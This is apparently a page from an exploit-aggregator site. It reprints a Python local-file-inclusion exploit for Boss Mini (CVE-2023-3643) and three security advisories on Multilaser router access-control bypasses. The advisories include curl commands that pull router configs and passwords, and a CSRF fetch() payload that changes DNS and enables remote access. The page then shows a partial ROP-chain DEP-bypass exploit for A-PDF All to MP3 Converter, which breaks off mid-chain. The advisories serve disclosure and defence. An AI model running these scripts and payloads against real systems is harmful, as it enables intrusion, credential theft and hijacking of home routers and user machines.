Latest exploits :: CodePwn

<pre><code># Exploit Title: Boss Mini 1.4.0 - local file inclusion # Date: 07/12/2023 # Exploit Author: [nltt0] (https://github.com/nltt-br)) # CVE: CVE-2023-3643 ''' _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \ | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ __/ | |___/ ''' from requests import post from urllib.parse import quote from argparse import ArgumentParser try: parser = ArgumentParser(description='Local file inclusion [Boss Mini]') parser.add_argument('--domain', required=True, help='Application domain') parser.add_argument('--file', required=True, help='Local file') args = parser.parse_args() host = args.domain file = args.file url = '{}/boss/servlet/document'.format(host) file2 = quote(file, safe='') headers = { 'Host': host, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange', 'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host) } data = { 'path': file2 } try: req = post(url, headers=headers, data=data, verify=False) if req.status_code == 200: print(req.text) except Exception as e: print('Error in {}'.format(e)) except Exception as e: print('Error in {}'.format(e)) </code></pre>

<pre><code>=====[Tempest Security Intelligence - Security Advisory - CVE-2023-38946]======= Access Control Bypass in Multilaser router's Web Management Interface Author: Vinicius Moraes < vinicius.moraes.w () gmail com > =====[Table of Contents]======================================================== 1. Overview 2. Detailed description 3. Other contexts & solutions 4. Acknowledgements 5. Timeline 6. References =====[1. Overview]============================================================== * Systems affected: Multilaser RE160 web interface - V5.07.51_pt_MTL01(verified) - V5.07.52_pt_MTL01(verified) (other routers/versions may be affected) * Release date: 28/02/2024 * CVSS score: 7.7 / High * CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N * Impact: This vulnerability allows attackers to bypass the access control of the router's web interface and perform management actions, such as changing the DNS settings, enabling router remote access, changing the IP routing table, and retrieving the WiFi and management application passwords. A noteworthy aspect also regards the fact that the attack can be conducted remotely. =====[2. Detailed description]================================================== The affected Multilaser router has a web management interface designed to graphically assist users in configuring features and diagnosing problems. However, there is a bug in its access control mechanism that allows unauthenticated users to access the router's management features. In order to exploit this bug, it is necessary to add an "admin:" cookie in the requests. The following example shows how an unauthenticated user (not bearing a credential or session token) could perform it by using the curl tool[1] to retrieve, for example, a backup of the router config, which contains its web interface password: [snippet] $ # traditional unauthenticated request being redirected to the login page $ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E 'HTTP/|Locatio' HTTP/1.0 302 Redirect Location: http://[routerIpAddress]/login.asp $ $ # malicious unauthenticated request getting the web interface password $ # (in this example: "pass123") $ curl -isH 'Cookie: admin:' [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E 'HTTP/|http_passwd' HTTP/1.0 200 OK http_passwd=pass123 [/snippet] By performing the aforementioned steps, an attacker gains access to all features of the web interface, either by exploiting the issue in other endpoints or by using the interface password, contained in the router config, as a traditional user. This vulnerability can be exploited remotely via a malicious mobile/desktop application performing HTTP requests against the router, or locally by connecting to a vulnerable router (such as through the wireless infrastructure of a coffee shop or airport). =====[3. Other contexts & solutions]============================================ Conceptually, in order to fix this issue, the server receiving the request must always validate the value of the cookie as a prerequisite for enforcing access control. Besides that, this value cannot be predictable. Upon not receiving a valid session token within the request, users should be redirected to the login page. Practically, updating to the latest firmware (V5.07.52_pt_MTL01) will reduce the attack window for this vulnerability, limiting the exploitation to only work when there is an active user session on the router. However, this equipment is also affected by another vulnerability with the same impact and no attack window limitation[3]. Furthermore, Multilaser informed that they contacted the firmware vendor of the model RE160, but due to the age of the equipment and its limitations, it will not receive an update. Therefore, it is recommended to replace the RE160 router with a new one that is receiving updates (such as RE160V or RE163V)[4][5]. =====[4. Acknowledgements]====================================================== Joaquim Brasil de Oliveira < palulabrasil () gmail com > < twitter.com/palulabr > Tempest Security Intelligence[2] =====[5. Timeline]============================================================== 28/04/2023 - The bug regarding model RE160 was reported to vendor; 29/06/2023 - A new contact was made with the company; 29/06/2023 - Vendor sent the available latest firmware for RE160; 07/07/2023 - It was confirmed that the latest firmware was still vulnerable; 26/10/2023 - Vendor informed that RE160 will not receive a full fix. =====[6. References]============================================================ [1] https://curl.se [2] https://tempest.com.br [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38945 [4] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v [5] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v </code></pre>

<pre><code>=====[Tempest Security Intelligence - Security Advisory - CVE-2023-38945]======= Access Control Bypass in Multilaser routers' Web Management Interface Author: Vinicius Moraes < vinicius.moraes.w () gmail com > =====[Table of Contents]======================================================== 1. Overview 2. Detailed description 3. Other contexts & solutions 4. Acknowledgements 5. Timeline 6. References =====[1. Overview]============================================================== * Systems affected: Multilaser RE160 web interface - V5.07.51_pt_MTL01(verified) - V5.07.52_pt_MTL01(verified) (other routers/versions may be affected) Multilaser RE160V web interface - V12.03.01.08_pt (verified) - V12.03.01.09_pt (verified) (other routers/versions may be affected) Multilaser RE163V web interface - V12.03.01.08_pt (verified) (other routers/versions may be affected) * Release date: 28/02/2024 * CVSS score: 7.7 / High * CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N * Impact: This vulnerability allows attackers to bypass the access control of the routers' web interface and perform management actions, such as changing the DNS settings, enabling router remote access, changing the IP routing table, and retrieving the WiFi and management application passwords. A noteworthy aspect also regards the fact that the attack can be conducted remotely. =====[2. Detailed description]================================================== The affected Multilaser routers have a web management interface designed to graphically assist users in configuring features and diagnosing problems. However, there is a bug in its access control mechanism that allows unauthenticated users to access routers' management features. In order to exploit this bug, it is necessary to add a specific extension at the end of the URLs. Some acceptable extension values are: js, css, png, jpg, gif, jsp. The following example shows how an unauthenticated user (not bearing a credential or session token) could perform it by using the curl tool[1] to retrieve, for example, a backup of the RE160 router config, which contains its web interface password: [snippet] $ # traditional unauthenticated request being redirected to the login page $ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E 'HTTP/|Locatio' HTTP/1.0 302 Redirect Location: http://[routerIpAddress]/login.asp $ $ # malicious unauthenticated request getting the web interface password $ # (in this example: "pass123") $ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E 'HTTP/|http_pass' HTTP/1.0 200 OK http_passwd=pass123 [/snippet] Furthermore, the next example presents part of a JavaScript code that could be added to a malicious website with the purpose of changing the router's DNS address and enabling remote access on vulnerable RE160V and RE163V routers. This can be achieved by exploiting this access control issue and a CSRF[3]: [code] fetch('http://[routerIpAddress]/goform/setSysTools/.js', { 'method': 'POST', 'mode': 'no-cors', 'headers': { 'Content-Type': 'application/x-www-form-urlencoded' }, 'body': 'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=& module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080' }) [/code] By performing the aforementioned steps, an attacker can gain access to all features of the web interface. This vulnerability can be exploited remotely via a malicious website or a mobile/desktop application performing HTTP requests against the router. And also locally, by connecting to a vulnerable router (such as through the wireless infrastructure of a coffee shop or airport). =====[3. Other contexts & solutions]============================================ Conceptually, in order to fix this issue, the server receiving the request must always validate the session token in authenticated features as a prerequisite for enforcing access control, regardless of any extension in the URL. Upon not receiving a valid session token within the request, users should be redirected to the login page. Practically, to mitigate this issue, the RE160V should be updated to firmware V12.03.01.12 or newer[4], the RE163V to firmware V12.03.01.10 or newer[5]. Multilaser informed that they contacted the firmware vendor of the model RE160, but due to the age of the equipment and its limitations, it will not receive an update to fix the issue. Therefore, it is recommended to replace the RE160 router with a new one that has received the fix (such as RE160V or RE163V). =====[4. Acknowledgements]====================================================== Joaquim Brasil de Oliveira < palulabrasil () gmail com > < twitter.com/palulabr > Tempest Security Intelligence[2] =====[5. Timeline]============================================================== 13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10) fixed the bug; 28/04/2023 - The bug regarding model RE160V was reported to the vendor; 29/06/2023 - A new contact was made with the company; 29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V; 07/07/2023 - The same bug in model RE160 was reported to the vendor; 16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) where the bug was fixed; 26/10/2023 - Vendor informed that RE160 will not receive a fix; 26/10/2023 - Vendor released the RE160V update on its website[4]. =====[6. References]============================================================ [1] https://curl.se [2] https://tempest.com.br [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152 [4] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v [5] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v </code></pre>

<pre><code>ulldisclosure-bounces@seclists.org> Status: RO Content-Length: 5433 Lines: 153 =====[Tempest Security Intelligence - Security Advisory - CVE-2023-38944]======= Access Control Bypass in Multilaser routers' Web Management Interface Author: Vinicius Moraes < vinicius.moraes.w () gmail com > =====[Table of Contents]======================================================== 1. Overview 2. Detailed description 3. Other contexts & solutions 4. Acknowledgements 5. Timeline 6. References =====[1. Overview]============================================================== * Systems affected: Multilaser RE160V web interface - V12.03.01.09_pt (verified) (other routers/versions may be affected) Multilaser RE163V web interface - V12.03.01.10_pt (verified) (other routers/versions may be affected) * Release date: 28/02/2024 * CVSS score: 7.7 / High * CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N * Impact: This vulnerability allows attackers to bypass the access control of the routers' web interface and perform management actions, such as changing the DNS settings, enabling router remote access, changing the IP routing table, and retrieving the WiFi and management application passwords. A noteworthy aspect also regards the fact that the attack can be conducted remotely. =====[2. Detailed description]================================================== The affected Multilaser routers have a web management interface designed to graphically assist users in configuring features and diagnosing problems. However, there is a bug in its access control mechanism that allows unauthenticated users to access the routers' management features. In order to exploit this bug, it is necessary to remove the Host header of the HTTP requests. The following example shows how an unauthenticated user (not bearing a credential or session token) could perform it by using the curl tool[1] to retrieve, for example, a backup of the router config: [snippet] $ # traditional unauthenticated request being redirected to the login page $ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg | head -8 HTTP/1.0 302 Redirect Server: GoAhead-Webs Date: Sun Jun 28 11:59:42 2009 Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Location: http://[routerIpAddress]/login.html $ # malicious unauthenticated request getting the router config $ curl -isOH 'Host:' [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg $ head -8 RouterCfm.cfg HTTP/1.0 200 OK Date: Sun Jun 28 12:00:00 2009 Server: GoAhead-Webs Last-modified: Sun Jun 28 12:00:00 2009 Content-length: 16108 Content-type: config/conf Connection: close [/snippet] By performing the aforementioned steps, an attacker gains access to all features of the web interface, either by exploiting the issue in other endpoints or by using the interface password, contained in the router config, as a traditional user: [snippet] $ # getting the web interface password (in this example: "myPass333") $ # stored in base64 in the config file $ awk -F 'd=' '/http_passwd=/{ print $2 }' RouterCfm.cfg | tr -d '\15' bXlQYXNzMzMz $ # decoding the web interface password $ echo "bXlQYXNzMzMz" | base64 -d myPass333 [/snippet] This vulnerability can be exploited remotely via a malicious mobile/desktop application performing HTTP requests against the router, or locally by connecting to a vulnerable router (such as through the wireless infrastructure of a coffee shop or airport). =====[3. Other contexts & solutions]============================================ Conceptually, in order to fix this issue, the server receiving the request must always validate the session token as a prerequisite for enforcing access control, regardless of any header. Upon not receiving a valid session token within the request, users should be redirected to the login page. Practically, to mitigate this issue, the routers should be updated to firmware V12.03.01.12 or newer[3][4]. =====[4. Acknowledgements]====================================================== Joaquim Brasil de Oliveira < palulabrasil () gmail com > < twitter.com/palulabr > Tempest Security Intelligence[2] =====[5. Timeline]============================================================== 28/04/2023 - The bug regarding model RE163V was reported to the vendor; 29/06/2023 - A new contact was made with the company; 29/06/2023 - Vendor informed they were analysing the bug; 19/07/2023 - Vendor shared a new firmware update for RE163V; 25/07/2023 - The same bug in model RE160V was reported to the vendor; 04/08/2023 - Vendor shared a new firmware update for RE163V; 30/08/2023 - Vendor fixed the bug in RE163V with firmware V12.03.01.12; 16/10/2023 - Vendor fixed the bug in RE160V with firmware V12.03.01.12; 26/10/2023 - vendor released the updates on its website[3][4]. =====[6. References]============================================================ [1] https://curl.se [2] https://tempest.com.br [3] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v [4] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v </code></pre>

<pre><code>#!/usr/bin/python # Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain # Date: 16 November 2023 # Exploit Author: George Washington # Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm # Software Link: http://www.a-pdf.com/all-to-mp3/download.htm # Version: 2.0.0 # Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64 # Based on: https://www.exploit-db.com/exploits/17275 # Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe # Video: https://youtu.be/_JEgdKjbtpI import socket, struct file = "1.wav" size = 8000 ############ Parameters for HeapCreate() ############ EXE = b"ZZZZ" # HeapCreate() EXE += b"AAAA" # RET EXE += struct.pack("<I", 0x00040000) # Parameter 1 0x00040000 EXE += struct.pack("<I", 0x00000000) # Parameter 2 0x00000000 EXE += struct.pack("<I", 0x00000000) # Parameter 3 0x00000000 EXE += b"YYYY" # HeapAlloc() EXE += b"BBBB" # RET EXE += b"CCCC" # Parameter 1 hHandle EXE += struct.pack("<I", 0x00000008) # Parameter 2 0x00000008 EXE += struct.pack("<I", 0x00000500) # Parameter 3 0x00000500 EXE += struct.pack("<I", 0x1002dd98) # _memcpy_s() EXE += b"DDDD" # heap pointer EXE += b"EEEE" # heap pointer EXE += struct.pack("<I", 0x00000500) # size EXE += b"GGGG" # shellcode pointer EXE += struct.pack("<I", 0x00000500) # size junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1 ####################### STACK PIVOT ########################### SEH = struct.pack("<I", 0x005CE870) # 0x005CE870 add esp 0x800, 4 pops, ret [alltomp3.exe] ####################### 1. Get Stack Pointer to point to ZZZZ ########################### ROP = struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** ROP += b"A" * 4 ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found) ROP += struct.pack("<I", 0xffffff1c) ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found) ROP += struct.pack("<I", 0x41414141)*4 ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found) ROP += b"A" * 4 # ecx points to ZZZZ ####################### 2. Get and set ZZZZ to HeapCreate ########################### ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll] ROP += b"A" * 0x10 ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IAT ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll] ROP += struct.pack("<I", 0x41414141) # eax has HeapCreate ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll] ####################### 3. Set RET ########################### ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) ROP += struct.pack("<I", 0x1001939e) # 0x1001939e: add esp, 0x000001A0 ; ret ; (1 found) ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** ####################### 4. Go to HeapCreate ########################### ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** ROP += b"A" * 4 ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret ; (1 found) ROP += struct.pack("<I", 0xfffffea4) ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret ; (1 found) ROP += struct.pack("<I", 0x41414141)*4 ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret ; (1 found) ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret ; (1 found) // pad it # when heap create finishes, eax will have hHeap ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret ; (1 found) ####################### 5. Get Stack Pointer to point to YYYY ########################### ROP += struct.pack("<I", 0x0042C7CB) # 0x0042C7CB # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe] ** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll] ** ROP += b"A" * 4 ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret ; (1 found) ROP += struct.pack("<I", 0xfffffe58) ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret ; (1 found) ROP += struct.pack("<I", 0x41414141)*3 ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ; (1 found) ROP += b"A" * 4 # ecx points to YYYY ####################### 6. Get and set YYYY to HeapAlloc ########################### ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) [Module : lame_enc.dll] ROP += b"A" * 0x10 ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IAT ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret ; (1 found) [Module : lame_enc.dll] ROP += struct.pack("<I", 0x41414141) # eax has HeapCreate ROP += struct.pack("<I", 0x1003303A) # 0x1003303A # MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll] ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret ; (1 found) [Module : lame_enc.dll] ####################### 7. Set RET ########################### ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret ; (1 found) ROP += struct.pack("<I", 0x10014d32) # 0x10014d32: add esp, 0x00000280 ; ret 